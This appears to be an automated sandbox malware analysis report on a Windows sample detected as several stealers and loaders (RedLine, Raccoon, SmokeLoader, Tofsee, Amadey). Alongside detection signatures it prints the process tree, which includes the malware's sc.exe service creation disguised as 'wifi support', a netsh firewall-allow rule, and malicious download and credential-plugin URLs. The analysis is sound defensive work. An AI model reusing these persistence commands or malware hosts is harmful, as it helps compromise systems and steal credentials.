Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report U3E7zMaux2.exe

Overview

General Information

Sample Name:U3E7zMaux2.exe
Analysis ID:552969
MD5:8362e0f91ae3379c73422bbca7bac493
SHA1:ec761f77bbe9900aed7ffa0a9303dc6801a9effb
SHA256:adfea20237be615461c44fea423d6043fc74bf1c5303ee33fcecd8acd201291e
Tags:CoinMinerexe
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected BatToExe compiled binary
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • U3E7zMaux2.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\U3E7zMaux2.exe" MD5: 8362E0F91AE3379C73422BBCA7BAC493)
    • U3E7zMaux2.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\U3E7zMaux2.exe" MD5: 8362E0F91AE3379C73422BBCA7BAC493)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • D984.exe (PID: 5756 cmdline: C:\Users\user\AppData\Local\Temp\D984.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • E666.exe (PID: 4780 cmdline: C:\Users\user\AppData\Local\Temp\E666.exe MD5: 8362E0F91AE3379C73422BBCA7BAC493)
          • E666.exe (PID: 4388 cmdline: C:\Users\user\AppData\Local\Temp\E666.exe MD5: 8362E0F91AE3379C73422BBCA7BAC493)
        • 7CA1.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\7CA1.exe MD5: 3754DB9964B0177B6E905999B6F18FD7)
        • 86C4.exe (PID: 1368 cmdline: C:\Users\user\AppData\Local\Temp\86C4.exe MD5: B11C5DEFDBA76C2B3EE67EE1B474389D)
          • cmd.exe (PID: 5208 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cmd.exe (PID: 5464 cmdline: C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                • extd.exe (PID: 6816 cmdline: C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" MD5: 139B5CE627BC9EC1040A91EBE7830F7C)
          • cmd.exe (PID: 6392 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3496 cmdline: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1716 cmdline: C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4728 cmdline: "C:\Windows\System32\sc.exe" start shayesoq MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 5988 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 8EC4.exe (PID: 6024 cmdline: C:\Users\user\AppData\Local\Temp\8EC4.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 8EC4.exe (PID: 6240 cmdline: C:\Users\user\AppData\Local\Temp\8EC4.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 7801.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\7801.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 8ED5.exe (PID: 5992 cmdline: C:\Users\user\AppData\Local\Temp\8ED5.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 5568 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
        • 9A02.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\9A02.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)
  • svchost.exe (PID: 2480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • uufaeea (PID: 2804 cmdline: C:\Users\user\AppData\Roaming\uufaeea MD5: 8362E0F91AE3379C73422BBCA7BAC493)
    • uufaeea (PID: 6944 cmdline: C:\Users\user\AppData\Roaming\uufaeea MD5: 8362E0F91AE3379C73422BBCA7BAC493)
  • svchost.exe (PID: 5444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5680 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4936 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • lagavljy.exe (PID: 4544 cmdline: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe" MD5: 7A36C0AD3083A1519CCE3A67BB377D18)
    • svchost.exe (PID: 5940 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000032.00000002.864947877.0000000000BF0000.00000004.00000040.sdmpJoeSecurity_BatToExeYara detected BatToExe compiled binaryJoe Security
        00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0000002E.00000003.894641410.00000000022C0000.00000004.00000040.sdmpJoeSecurity_BatToExeYara detected BatToExe compiled binaryJoe Security
            00000032.00000002.864706939.00000000005F0000.00000004.00000020.sdmpJoeSecurity_BatToExeYara detected BatToExe compiled binaryJoe Security
              00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
                Click to see the 42 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                11.2.uufaeea.4615a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  21.2.86C4.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    40.0.8EC4.exe.400000.10.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      19.2.E666.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                        40.0.8EC4.exe.400000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          Click to see the 34 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe", ParentImage: C:\Windows\SysWOW64\shayesoq\lagavljy.exe, ParentProcessId: 4544, ProcessCommandLine: svchost.exe, ProcessId: 5940
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, ProcessId: 6392
                          Sigma detected: Suspicious Svchost ProcessShow sources
                          Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe", ParentImage: C:\Windows\SysWOW64\shayesoq\lagavljy.exe, ParentProcessId: 4544, ProcessCommandLine: svchost.exe, ProcessId: 5940
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 5988
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3496

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dllAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: U3E7zMaux2.exeVirustotal: Detection: 41%Perma Link
                          Source: U3E7zMaux2.exeReversingLabs: Detection: 46%
                          Multi AV Scanner detection for domain / URLShow sources
                          Source: http://185.215.113.35/d2VxjasuwS/index.php?scr=1Virustotal: Detection: 12%Perma Link
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeVirustotal: Detection: 16%Perma Link
                          Machine Learning detection for sampleShow sources
                          Source: U3E7zMaux2.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8ED5.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\9A02.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeJoe Sandbox ML: detected
                          Source: 43.3.7801.exe.4d60000.2.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                          Source: 21.2.86C4.exe.540e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 21.3.86C4.exe.560000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 36.2.lagavljy.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 20.2.7CA1.exe.570e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 36.3.lagavljy.exe.490000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 36.2.lagavljy.exe.650000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 39.2.svchost.exe.320000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 21.2.86C4.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 36.2.lagavljy.exe.470e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 20.3.7CA1.exe.590000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                          Bitcoin Miner:

                          barindex
                          Found strings related to Crypto-MiningShow sources
                          Source: 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmpString found in binary or memory: XMRig 6.2.2es\AppData\Roaming\Sysfiles\Driver.exed-F

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeUnpacked PE file: 20.2.7CA1.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeUnpacked PE file: 21.2.86C4.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeUnpacked PE file: 36.2.lagavljy.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack
                          Source: U3E7zMaux2.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49792 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49811 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49896 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49947 version: TLS 1.2
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 7801.exe, 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.769293976.0000000001136000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: )C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb86 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
                          Source: Binary string: profapi.pdb*6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: el.pdb source: 7801.exe
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdbz6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7CA1.exe, 00000014.00000000.769330269.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: /;C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
